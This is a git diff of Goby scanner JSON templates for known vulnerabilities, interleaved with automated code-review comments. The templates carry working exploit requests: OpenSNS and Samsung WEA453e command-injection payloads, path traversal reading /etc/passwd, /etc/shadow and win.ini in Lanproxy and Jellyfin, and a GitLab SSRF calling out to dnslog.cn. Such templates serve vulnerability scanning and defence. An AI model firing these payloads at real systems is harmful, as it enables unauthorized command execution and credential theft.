@@ -88,6 +88,43 @@ ] } ], - "PostTime": "2021-12-08 11:22:44", - "GobyVersion": "1.9.310" + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/test.php", + "follow_redirect": true, + "header": null, + "data_type": "text", + "data": "", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "test", + "bz": "" + } + ] + }, + "SetVariable": [ + "output|lastbody|regex|" + ] + } + ], + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/GitLab_SSRF_CVE_2021_22214.json b/json/GitLab_SSRF_CVE_2021_22214.json index 286fa3b..53e0dc4 100644 --- a/json/GitLab_SSRF_CVE_2021_22214.json +++ b/json/GitLab_SSRF_CVE_2021_22214.json 
@@ -1,26 +1,35 @@ { "Name": "GitLab SSRF CVE-2021-22214", "Level": "3", - "Tags": [], - "GobyQuery": "app=\"GitLab\"", - "Description": "GitLab存在前台未授权SSRF漏洞,未授权的攻击者也可以利用该漏洞执行SSRF攻击(CVE-2021-22214)。该漏洞源于对用户提供数据的验证不足,远程攻击者可通过发送特殊构造的 HTTP 请求,欺骗应用程序向任意系统发起请求。攻击者成功利用该漏洞可获得敏感数据的访问权限或向其他服务器发送恶意请求。", - "Product": "Gitlab > 10.5", - "Homepage": "https://gobies.org/", - "Author": "luckying", - "Impact": "", - "Recommandation": "", - "References": [ - "https://gobies.org/" + "Tags": [ + "SSRF" ], - "HasExp": true, - "ExpParams": [ - { - "name": "URL", - "type": "input", - "value": "test.dnslog.cn", - "show": "" - } - ], + "GobyQuery": "app=\"GitLab\"", + "Description": "GitLab is The DevOps Platform.", + "Product": "GitLab", + "Homepage": "https://about.gitlab.com/", + "Author": "", + "Impact": "When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab CE/EE affecting all versions starting from 10.5 was possible to exploit for an unauthenticated attacker even on a GitLab instance where registration is limited.", + "Recommendation": "", + "References": [ + "https://nvd.nist.gov/vuln/detail/CVE-2021-22214", + "https://nvd.nist.gov/vuln/detail/CVE-2021-39935", + "https://nvd.nist.gov/vuln/detail/CVE-2021-22175", + "https://vin01.github.io/piptagole/gitlab/ssrf/security/2021/06/15/gitlab-ssrf.html", + "https://docs.gitlab.com/ee/api/lint.html" + ], + "HasExp": true, + "ExpParams": [ + { + "Name": "URL", + "Type": "input", + "Value": "test.dnslog.cn" + } + ], + "ExpTips": { + "Type": "", + "Content": "" + }, "ScanSteps": [ "AND", { 
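Review bot: The new `"Tags"` value `"SSRF"` is upper-case while every other tag in this commit is lower-case (`"rce"`, `"sqli"`, `"unauth"`, `"getshell"`), and the IRDM4000 hunk below introduces `"unauthorized access"` where Docker Registry uses `"unauth"`; if tags drive filtering, one concept now has several spellings. Normalizing to `"ssrf"` here and `"unauth"` there would keep them consistent. Separately, the References now list CVE-2021-39935 and CVE-2021-22175 under an entry named for CVE-2021-22214; if they are related advisories the Impact text could say so, otherwise they belong in their own entries.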
@@ -30,8 +39,7 @@ "follow_redirect": false, "header": { "Content-Type": "application/json", - "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", - "Content-Length": "" + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" }, "data_type": "text", "data": "{\"include_merged_yaml\":true,\"content\":\"include:\\n remote: http://test.dnslog.cn/api/v1/targets?test.yml\",\"wglt1cskpv\":\"=\"}" @@ -57,9 +65,45 @@ ] }, "SetVariable": [] + }, + { + "Request": { + "method": "POST", + "uri": "/api/v4/ci/lint?include_merged_yaml=true", + "follow_redirect": true, + "header": { + "Content-Type": "application/json" + }, + "data_type": "text", + "data": "{\"content\": \"include:\\n remote: http://127.0.0.1:9100/test.yml\"}", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "does not have valid YAML syntax", + "bz": "" + } + ] + }, + "SetVariable": [ + "output|lastbody|regex|" + ] } ], - "ExploitSteps": [ + "ExploitSteps": [ "AND", { "Request": { @@ -68,8 +112,7 @@ "follow_redirect": false, "header": { "Content-Type": "application/json", - "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", - "Content-Length": "" + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" }, "data_type": "text", "data": "{\"include_merged_yaml\":true,\"content\":\"include:\\n remote: http://{{{URL}}}/api/v1/targets?test.yml\",\"wglt1cskpv\":\"=\"}" 
@@ -95,10 +138,10 @@ ] }, "SetVariable": [ - "output|lastbody" - ] + "output|lastbody|undefined|undefined" + ] } ], - "PostTime": "2021-07-01 20:34:22", - "GobyVersion": "1.8.268" + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/H3C_IMC_RCE.json b/json/H3C_IMC_RCE.json index 6f4447d..98e6f40 100644 --- a/json/H3C_IMC_RCE.json +++ b/json/H3C_IMC_RCE.json @@ -1,26 +1,32 @@ { - "Name": "H3C IMC远程命令执行", + "Name": "H3C IMC RCE", "Level": "3", - "Tags": [], + "Tags": [ + "rce" + ], "GobyQuery": "product=\"H3C-iMC\"", - "Description": "", - "Product": "H3C iMC 智能管理中心平台", + "Description": "H3C IMC", + "Product": "H3C IMC", "Homepage": "http://www.h3c.com/cn/Products___Technology/Products/H3C_Soft/IT_Business/Resource/iMC_Flat", - "Author": "ying", - "Impact": "", - "Recommandation": "", + "Author": "", + "Impact": "A vulnerability in H3C IMC allows remote unauthenticated attackers to cause the remote web application to execute arbitrary commands via the 'dynamiccontent.properties.xhtml' endpoint.", + "Recommendation": "", "References": [ + "https://mp.weixin.qq.com/s/BP9_H3lpluqIwL5OMIJlIw", "https://www.t00ls.net/articles-60979.html" ], - "HasExp": true, - "ExpParams": [ - { - "name": "Cmd", - "type": "input", - "value": "whoami", - "show": "" - } - ], + "HasExp": true, + "ExpParams": [ + { + "Name": "Cmd", + "Type": "input", + "Value": "whoami" + } + ], + "ExpTips": { + "Type": "", + "Content": "" + }, "ScanSteps": [ "AND", { @@ -57,8 +63,8 @@ }, "SetVariable": [] } - ], - "ExploitSteps": [ + ], + "ExploitSteps": [ "AND", { "Request": { @@ -93,10 +99,10 @@ ] }, "SetVariable": [ - "output|lastbody" - ] + "output|lastbody|undefined|undefined" + ] } - ], - "PostTime": "2021-05-28 10:06:39", - "GobyVersion": "1.8.268" + ], + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file 
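Review bot: `"output|lastbody|undefined|undefined"` replaces `"output|lastbody"`, and the literal `undefined` segments look like a serialization artifact (an unset field rendered by a JavaScript tool) rather than an intended specifier; other entries in this commit use `"output|lastbody|regex|"` for the same slot. Unless the loader documents `undefined` as a valid token, this should be `"output|lastbody|regex|"` to match the rest of the corpus. The same string is introduced in the H3C IMC hunk on this line and in the IceWarp hunk below.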
diff --git a/json/IRDM4000_Smart_station_Unauthorized_access.json b/json/IRDM4000_Smart_station_Unauthorized_access.json index 732a316..09c218d 100644 --- a/json/IRDM4000_Smart_station_Unauthorized_access.json +++ b/json/IRDM4000_Smart_station_Unauthorized_access.json @@ -1,18 +1,18 @@ { "Name": "IRDM4000 Smart station Unauthorized access", "Level": "2", - "Tags": [], - "GobyQuery": "body=\"iRDM4000智慧站房在线监管\"", - "Description": "IRDM4000 unauthorized access vulnerability of userId=0", - "Product": "IRDM4000 Smart station", - "Homepage": "http://www.houtian-hb.com", - "Author": "gobysec@gmail.com", - "Impact": "", - "Recommendation": "", - "References": [ - "https://gobies.org/" + "Tags": [ + "unauthorized access" ], - "HasExp": true, + "GobyQuery": "body=\"iRDM4000智慧站房在线监管\"", + "Description": "IRDM4000 Smart station", + "Product": "IRDM4000 Smart station", + "Homepage": "http://www.houtian-hb.com/", + "Author": "", + "Impact": "IRDM4000 unauthorized access vulnerability of userId=0", + "Recommendation": "", + "References": [], + "HasExp": false, "ExpParams": null, "ExpTips": { "Type": "", @@ -64,43 +64,6 @@ ] } ], - "ExploitSteps": [ - "AND", - { - "Request": { - "method": "GET", - "uri": "/test.php", - "follow_redirect": true, - "header": null, - "data_type": "text", - "data": "", - "set_variable": [] - }, - "ResponseTest": { - "type": "group", - "operation": "AND", - "checks": [ - { - "type": "item", - "variable": "$code", - "operation": "==", - "value": "200", - "bz": "" - }, - { - "type": "item", - "variable": "$body", - "operation": "contains", - "value": "test", - "bz": "" - } - ] - }, - "SetVariable": [ - "output|lastbody|regex|" - ] - } - ], - "PostTime": "2021-10-26 10:55:38", - "GobyVersion": "1.9.304" + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/IceWarp_WebClient_basic_RCE.json b/json/IceWarp_WebClient_basic_RCE.json index def811a..ce82ebb 100644 --- a/json/IceWarp_WebClient_basic_RCE.json 
+++ b/json/IceWarp_WebClient_basic_RCE.json @@ -1,26 +1,31 @@ { "Name": "IceWarp WebClient basic RCE", "Level": "3", - "Tags": [], - "GobyQuery": "body=\"Powered by IceWarp\"", - "Description": "", - "Product": "", - "Homepage": "https://gobies.org/", - "Author": "luckying", - "Impact": "", - "Recommandation": "", - "References": [ - "https://gobies.org/" + "Tags": [ + "rce" ], - "HasExp": true, - "ExpParams": [ - { - "name": "cmd", - "type": "input", - "value": "ipconfig", - "show": "" - } - ], + "GobyQuery": "body=\"Powered by IceWarp\"", + "Description": "IceWarp", + "Product": "IceWarp", + "Homepage": "http://www.icewarp.cn/", + "Author": "", + "Impact": "IceWarp WebClient basic RCE", + "Recommendation": "", + "References": [ + "https://www.pwnwiki.org/index.php?title=IceWarp_WebClient_basic_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E" + ], + "HasExp": true, + "ExpParams": [ + { + "Name": "cmd", + "Type": "input", + "Value": "ipconfig" + } + ], + "ExpTips": { + "Type": "", + "Content": "" + }, "ScanSteps": [ "AND", { @@ -50,7 +55,7 @@ "SetVariable": [] } ], - "ExploitSteps": [ + "ExploitSteps": [ "AND", { "Request": { @@ -77,10 +82,10 @@ ] }, "SetVariable": [ - "output|lastbody" - ] + "output|lastbody|undefined|undefined" + ] } ], - "PostTime": "2021-06-19 13:19:47", - "GobyVersion": "1.8.268" + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/Jellyfin_10.7.0_Unauthenticated_Abritrary_File_Read_CVE_2021_21402.json b/json/Jellyfin_10.7.0_Unauthenticated_Abritrary_File_Read_CVE_2021_21402.json index bd7b941..770e348 100644 --- a/json/Jellyfin_10.7.0_Unauthenticated_Abritrary_File_Read_CVE_2021_21402.json +++ b/json/Jellyfin_10.7.0_Unauthenticated_Abritrary_File_Read_CVE_2021_21402.json 
@@ -1,28 +1,17 @@ { "Name": "Jellyfin 10.7.0 Unauthenticated Abritrary File Read CVE-2021-21402", "Level": "2", - "Tags": [ - "Disclosure of Sensitive Information" - ], - "GobyQuery": "(title='Jellyfin')", - "Description": "Jellyfin is a Free Software Media System. In Jellyfin before version 10.7.1, with certain endpoints, well crafted requests will allow arbitrary file read from a Jellyfin server's file system. This issue is more prevalent when Windows is used as the host OS. Servers that are exposed to the public Internet are potentially at risk. This is fixed in version 10.7.1. As a workaround, users may be able to restrict some access by enforcing strict security permissions on their filesystem, however, it is recommended to update as soon as possible.", - "Product": "Jellyfin", - "Homepage": "https://jellyfin.org/", - "Author": "PeiQi", - "Impact": "

Attackers can read arbitrary files to obtain sensitive information of the server

", + "Tags": [], + "GobyQuery": "title=\"Jellyfin\"", + "Description": "", + "Product": "", + "Homepage": "https://gobies.org/", + "Author": "gobysec@gmail.com", + "Impact": "", "Recommandation": "

undefined

", "References": [ - "http://wiki.peiqi.tech" + "https://gobies.org/" ], - "HasExp": true, - "ExpParams": [ - { - "name": "File", - "type": "select", - "value": "windows/win.ini", - "show": "" - } - ], "ScanSteps": [ "OR", { @@ -53,20 +42,6 @@ "operation": "contains", "value": "font", "bz": "" - }, - { - "type": "item", - "variable": "$body", - "operation": "contains", - "value": "file", - "bz": "" - }, - { - "type": "item", - "variable": "$body", - "operation": "contains", - "value": "extension", - "bz": "" } ] }, @@ -100,59 +75,12 @@ "operation": "contains", "value": "font", "bz": "" - }, - { - "type": "item", - "variable": "$body", - "operation": "contains", - "value": "extension", - "bz": "" - }, - { - "type": "item", - "variable": "$body", - "operation": "contains", - "value": "file", - "bz": "" } ] }, "SetVariable": [] } ], - "ExploitSteps": [ - "OR", - { - "Request": { - "method": "GET", - "uri": "/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/", - "follow_redirect": false, - "header": { - "Content-Type": "application/octet-stream" - }, - "data_type": "text", - "data": "" - }, - "SetVariable": [ - "output|lastbody" - ] - }, - { - "Request": { - "method": "GET", - "uri": "/Videos/1/hls/m/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/", - "follow_redirect": false, - "header": { - "Content-Type": "application/octet-stream" - }, - "data_type": "text", - "data": "" - }, - "SetVariable": [ - "output|lastbody" - ] - } - ], - "PostTime": "2021-04-07 21:05:13", + "PostTime": "2021-04-07 15:10:20", "GobyVersion": "1.8.255" } \ No newline at end of file diff --git a/json/Jitong_EWEBS_phpinfo_leak.json b/json/Jitong_EWEBS_phpinfo_leak.json index 5f1d567..9b579f8 100644 --- a/json/Jitong_EWEBS_phpinfo_leak.json +++ b/json/Jitong_EWEBS_phpinfo_leak.json 
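Review bot: The incoming side of this file is the less complete revision: the first hunk replaces the CVE description, the `Disclosure of Sensitive Information` tag, the vendor homepage and the wiki reference with the `gobies.org` defaults, and `PostTime` moves backwards from `2021-04-07 21:05:13` to `2021-04-07 15:10:20`, which suggests an older copy overwrote a newer one; the SonarQube hunks further down show the same backwards move (2022-06-25 to 2021-11-29, GobyVersion 1.9.323 to 1.9.310). The second and third hunks also drop the `file` and `extension` body checks from both `ScanSteps` groups, leaving `font` as the only body fingerprint, which is a much weaker match for a Jellyfin host and is likely to raise false positives. The misspelled `Recommandation` key survives on the context line while other files in this commit were corrected to `Recommendation`; if the loader reads `Recommendation`, the value here is silently ignored.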
@@ -1,17 +1,23 @@ { - "Name": "极通EWEBSphpinfo泄露", - "Level": "3", - "Tags": [], + "Name": "Jitong EWEBS phpinfo leak", + "Level": "0", + "Tags": [ + "infoleak" + ], "GobyQuery": "body=\"极通软件\"", "Description": "", - "Product": "", - "Homepage": "https://gobies.org/", - "Author": "gobysec@gmail.com", - "Impact": "", - "Recommandation": "", - "References": [ - "https://gobies.org/" - ], + "Product": "Jitong EWEBS", + "Homepage": "http://www.n-soft.com.cn/", + "Author": "", + "Impact": "Jitong EWEBS phpinfo leak", + "Recommendation": "", + "References": [], + "HasExp": true, + "ExpParams": null, + "ExpTips": { + "Type": "", + "Content": "" + }, "ScanSteps": [ "AND", { @@ -19,7 +25,7 @@ "method": "GET", "uri": "/testweb.php", "follow_redirect": false, - "header": {}, + "header": null, "data_type": "text", "data": "" }, @@ -39,6 +45,34 @@ "SetVariable": [] } ], - "PostTime": "2021-06-17 21:19:12", - "GobyVersion": "1.8.268" + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/testweb.php", + "follow_redirect": false, + "header": null, + "data_type": "text", + "data": "", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "PHP Version", + "bz": "" + } + ] + }, + "SetVariable": [] + } + ], + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/Konga_Default_JWT_KEY.json b/json/Konga_Default_JWT_KEY.json index b79727c..c5525c9 100644 --- a/json/Konga_Default_JWT_KEY.json +++ b/json/Konga_Default_JWT_KEY.json 
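Review bot: The `ExploitSteps` added in the third hunk repeats the `ScanSteps` request (`GET /testweb.php`) and sets `"SetVariable": []`, so `HasExp: true` in the first hunk promises an exploit stage that returns nothing the scan did not already establish. Either drop the block and keep `HasExp` false, or give it `"output|lastbody|regex|"` as the other entries do so the phpinfo page is actually returned to the operator. The first hunk also lowers `Level` from `"3"` to `"0"`; the page does not show the level scale, so this should be confirmed as intentional rather than a default written by the generator.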
@@ -4,12 +4,12 @@
 "Tags": [
 "defaultaccount"
 ],
- "GobyQuery": "(title==\"Konga\" | body=\"window.konga_version\")",
- "Description": "Konga JWT默认key为oursecret,可伪造任意用户权限。",
+ "GobyQuery": "title=\"Konga\" || body=\"window.konga_version\"",
+ "Description": "Konga offers the tools you need to manage your Kong cluster with ease.",
 "Product": "Konga",
 "Homepage": "https://github.com/pantsel/konga",
- "Author": "aetkrad",
- "Impact": "",
+ "Author": "",
+ "Impact": "The default key of Konga JWT is oursecret, which can forge arbitrary user permissions.",
 "Recommendation": "",
 "References": [
 "https://mp.weixin.qq.com/s/8guU2hT3wE2puEztdGqZQg"
@@ -112,6 +112,6 @@
 ]
 }
 ],
- "PostTime": "2021-12-03 18:50:39",
- "GobyVersion": "1.9.310"
+ "PostTime": "0000-00-00 00:00:00",
+ "GobyVersion": "0.0.0"
 }
\ No newline at end of file
diff --git a/json/Lanproxy_Directory_traversal_CVE_2021_3019.json b/json/Lanproxy_Directory_traversal_CVE_2021_3019.json
index 66130fd..8f5fab1 100644
--- a/json/Lanproxy_Directory_traversal_CVE_2021_3019.json
+++ b/json/Lanproxy_Directory_traversal_CVE_2021_3019.json
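Review bot: The added `GobyQuery` line in the first hunk changes `title==\"Konga\"` to `title=\"Konga\"` and drops the parentheses, while the YAPI entry later in this commit keeps `title==`; if `==` is the exact-match operator and `=` a substring match in this query language, the fingerprint is widened here and the two files now use different semantics for the same kind of check. The Samsung WEA453e and vRealize hunks make the same `==` to `=` change, so whichever form is intended should be applied consistently. With `Description` now marketing text, the new `Impact` sentence is the only place the default JWT key is mentioned; a one-line vulnerability summary in `Description` would keep the entry self-explanatory in listings.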
@@ -1,36 +1,44 @@ { - "Name": "Lanproxy目录遍历 CVE-2021-3019", + "Name": "Lanproxy Directory Traversal CVE-2021-3019", "Level": "2", - "Tags": [], - "GobyQuery": "header= \"Server: LPS-0.1\"", - "Description": "lanproxy是一个将局域网个人电脑、服务器代理到公网的内网穿透工具,目前仅支持tcp流量转发,可支持任何tcp上层协议(ssh访问、web服务器访问、远程桌面...)。", - "Product": "", - "Homepage": "https://gobies.org/", - "Author": "luckying", - "Impact": "", - "Recommandation": "", - "References": [ - "https://gobies.org/" + "Tags": [ + "Directory Traversal" ], - "HasExp": true, - "ExpParams": [ - { - "name": "path", - "type": "input", - "value": "/../conf/config.properties", - "show": "" - } - ], + "GobyQuery": "header=\"Server: LPS-0.1\"", + "Description": "Lanproxy is a reverse proxy to help you expose a local server behind a NAT or firewall to the internet. it supports any protocols over tcp (http https ssh ...)", + "Product": "ffay lanproxy 0.1", + "Homepage": "https://github.com/ffay/lanproxy", + "Author": "", + "Impact": "ffay lanproxy 0.1 allows Directory Traversal to read /../conf/config.properties to obtain credentials for a connection to the intranet.", + "Recommendation": "", + "References": [ + "https://github.com/ffay/lanproxy/commits/master", + "https://github.com/maybe-why-not/lanproxy/issues/1", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3019" + ], + "HasExp": true, + "ExpParams": [ + { + "Name": "Filename", + "Type": "select", + "Value": "/../../../../../../../../../../etc/passwd,/../conf/config.properties,/../../../../../../../../../../etc/shadow" + } + ], + "ExpTips": { + "Type": "", + "Content": "" + }, "ScanSteps": [ "AND", { "Request": { "method": "GET", "uri": "/../conf/config.properties", - "follow_redirect": false, - "header": {}, + "follow_redirect": true, + "header": null, "data_type": "text", - "data": "" + "data": "", + "set_variable": [] }, "ResponseTest": { "type": "group", 
@@ -47,34 +55,7 @@ "type": "item", "variable": "$body", "operation": "contains", - "value": "config.admin", - "bz": "" - } - ] - }, - "SetVariable": [] - } - ], - "ExploitSteps": [ - "AND", - { - "Request": { - "method": "GET", - "uri": "{{{path}}}", - "follow_redirect": false, - "header": {}, - "data_type": "text", - "data": "" - }, - "ResponseTest": { - "type": "group", - "operation": "AND", - "checks": [ - { - "type": "item", - "variable": "$code", - "operation": "==", - "value": "200", + "value": "server.ssl", "bz": "" }, { @@ -87,10 +68,40 @@ ] }, "SetVariable": [ - "output|lastbody" - ] + "output|lastbody|regex|" + ] } ], - "PostTime": "2021-06-24 17:23:13", - "GobyVersion": "1.8.268" + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "{{{Filename}}}", + "follow_redirect": true, + "header": null, + "data_type": "text", + "data": "", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + } + ] + }, + "SetVariable": [ + "output|lastbody|regex|" + ] + } + ], + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/OpenSNS_RCE.json b/json/OpenSNS_RCE.json index 75c0137..dd60778 100644 --- a/json/OpenSNS_RCE.json +++ b/json/OpenSNS_RCE.json 
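Review bot: The `ExploitSteps` block added in the last hunk judges success on `$code == 200` alone, and `follow_redirect` was flipped to `true` in both the scan request (first hunk) and this one, so a server that redirects the traversal path to a login or error page answers 200 and is reported as exploitable with that page as the output. Keeping `"follow_redirect": false` as before, or adding a body check comparable to the `server.ssl` check the scan step uses, would make the result reliable. The second hunk also swaps the scan fingerprint from `config.admin` to `server.ssl`; that both keys occur in a default `config.properties` is assumed here, not shown on the page, so the new value should be verified against a real file.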
@@ -1,28 +1,32 @@ { - "Name": "OpenSNS 远程代码执行漏洞", + "Name": "OpenSNS RCE", "Level": "3", "Tags": [ "RCE" ], "GobyQuery": "body=\"opensns\"", - "Description": "OpenSNS是想天科技开发的一款综合性社交软件,存在命令执行漏洞且是administrator", + "Description": "OpenSNS is a comprehensive social software developed by Xiangtian Technology.", "Product": "OpenSNS", "Homepage": "http://www.opensns.cn/", - "Author": "luckying", - "Impact": "", - "Recommandation": "", + "Author": "", + "Impact": "A vulnerability in OpenSNS allows remote unauthenticated attackers to cause the product to execute arbitrary code via the 'shareBox' endpoint.", + "Recommendation": "", "References": [ - "https://www.pwnwiki.org/index.php?title=OpenSNS_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E/zh-cn" + "http://www.0dayhack.net/index.php/2417/", + "https://www.pwnwiki.org/index.php?title=OpenSNS_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E" ], - "HasExp": true, - "ExpParams": [ - { - "name": "Cmd", - "type": "input", - "value": "whoami", - "show": "" - } - ], + "HasExp": true, + "ExpParams": [ + { + "Name": "Cmd", + "Type": "input", + "Value": "whoami" + } + ], + "ExpTips": { + "Type": "", + "Content": "" + }, "ScanSteps": [ "AND", { @@ -30,7 +34,7 @@ "method": "GET", "uri": "/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(ipconfig)", "follow_redirect": false, - "header": {}, + "header": null, "data_type": "text", "data": "" }, 
@@ -50,14 +54,14 @@ "SetVariable": [] } ], - "ExploitSteps": [ + "ExploitSteps": [ "AND", { "Request": { "method": "GET", "uri": "/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system({{{Cmd}}})", "follow_redirect": false, - "header": {}, + "header": null, "data_type": "text", "data": "" }, @@ -75,10 +79,10 @@ ] }, "SetVariable": [ - "output|lastbody" - ] + "output|lastbody|undefined|undefined" + ] } ], - "PostTime": "2021-06-28 11:44:33", - "GobyVersion": "1.8.268" + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/RuoYi_Druid_Unauthorized_access.json b/json/RuoYi_Druid_Unauthorized_access.json index 0e00144..4c5fc4d 100644 --- a/json/RuoYi_Druid_Unauthorized_access.json +++ b/json/RuoYi_Druid_Unauthorized_access.json @@ -2,18 +2,22 @@ "Name": "RuoYi Druid Unauthorized access", "Level": "0", "Tags": [ - "Disclosure of Sensitive Information" + "infoleak" ], "GobyQuery": "app=\"ruoyi-System\"", - "Description": "If Druid is used in the management system, anonymous access is enabled by default, resulting in unauthorized access to sensitive information", + "Description": "RuoYi", "Product": "RuoYi", "Homepage": "https://gitee.com/y_project/RuoYi-Vue", - "Author": "PeiQi", - "Impact": "

 resulting in unauthorized access to sensitive information

", - "Recommandation": "", - "References": [ - "http://wiki.peiqi.tech" - ], + "Author": "", + "Impact": "If Druid is used in the management system, anonymous access is enabled by default, resulting in unauthorized access to sensitive information.", + "Recommendation": "", + "References": [], + "HasExp": true, + "ExpParams": null, + "ExpTips": { + "Type": "", + "Content": "" + }, "ScanSteps": [ "AND", { @@ -21,7 +25,7 @@ "method": "GET", "uri": "/prod-api/druid/index.html", "follow_redirect": false, - "header": {}, + "header": null, "data_type": "text", "data": "" }, @@ -55,6 +59,43 @@ "SetVariable": [] } ], - "PostTime": "2021-04-20 23:13:54", - "GobyVersion": "1.8.258" + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/test.php", + "follow_redirect": true, + "header": null, + "data_type": "text", + "data": "", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "test", + "bz": "" + } + ] + }, + "SetVariable": [ + "output|lastbody|regex|" + ] + } + ], + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/Samsung_WLAN_AP_WEA453e_RCE.json b/json/Samsung_WLAN_AP_WEA453e_RCE.json index 60e097a..4b97f96 100644 --- a/json/Samsung_WLAN_AP_WEA453e_RCE.json +++ b/json/Samsung_WLAN_AP_WEA453e_RCE.json @@ -1,30 +1,42 @@ { "Name": "Samsung WLAN AP WEA453e RCE", "Level": "3", - "Tags": [], - "GobyQuery": "title==\"Samsung WLAN AP\"", - "Description": "三星 WLAN AP WEA453e路由器 存在远程命令执行漏洞,可在未授权的情况下执行任意命令获取服务器权限", - "Product": "三星 WLAN AP WEA453e路由器", - "Homepage": "https://www.samsung.com/", - "Author": "lxy@secbug.org", - "Impact": "
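Review bot: The `ExploitSteps` added in the last hunk is a placeholder, not an exploit: it requests `/test.php` and passes when the body contains `test`, yet the first hunk sets `HasExp: true`, so the template advertises a working exploit that either fails on every real target or matches any page containing that word; the YAPI file later in this commit adds the identical placeholder with the same `HasExp` flip. The IRDM4000 file at the top of this chunk removes exactly this block and sets `HasExp: false`, which is the consistent treatment. Until a real step exists, `"HasExp": false` with the `ExploitSteps` block removed is the safe state for this entry.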

暂无

", - "Recommandation": "

暂无

", - "References": [ - "Internet" + "Tags": [ + "rce" ], + "GobyQuery": "title=\"Samsung WLAN AP\" || app=\"Chunjs-server\" && body=\"Samsung Electronics\"", + "Description": "Samsung WLAN AP WEA453e", + "Product": "Samsung WLAN AP WEA453e", + "Homepage": "https://www.samsung.com/", + "Author": "", + "Impact": "Samsung WLAN AP wea453e router has a remote command execution vulnerability.", + "Recommendation": "", + "References": [], + "HasExp": true, + "ExpParams": [ + { + "Name": "Cmd", + "Type": "input", + "Value": "cat /etc/passwd" + } + ], + "ExpTips": { + "Type": "", + "Content": "" + }, "ScanSteps": [ "AND", { "Request": { - "method": "POST", + "method": "GET", "uri": "/(download)/tmp/a.txt", - "follow_redirect": true, + "follow_redirect": false, "header": { - "Connection": "close", - "Content-Length": "48" + "Content-Type": "application/json;charset=UTF-8" }, "data_type": "text", - "data": "command1=shell:cat /etc/passwd| dd of=/tmp/a.txt" + "data": "command1=shell:cat /etc/passwd| dd of=/tmp/a.txt", + "set_variable": [] }, "ResponseTest": { "type": "group", @@ -46,9 +58,43 @@ } ] }, - "SetVariable": [] + "SetVariable": [ + "output|lastbody|regex|" + ] } ], - "PostTime": "2021-04-01 11:47:39", - "GobyVersion": "1.8.237" + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/(download)/tmp/a.txt", + "follow_redirect": false, + "header": { + "Content-Type": "application/json;charset=UTF-8" + }, + "data_type": "text", + "data": "command1=shell:{{{Cmd}}}| dd of=/tmp/a.txt", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + } + ] + }, + "SetVariable": [ + "output|lastbody|regex|" + ] + } + ], + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file 
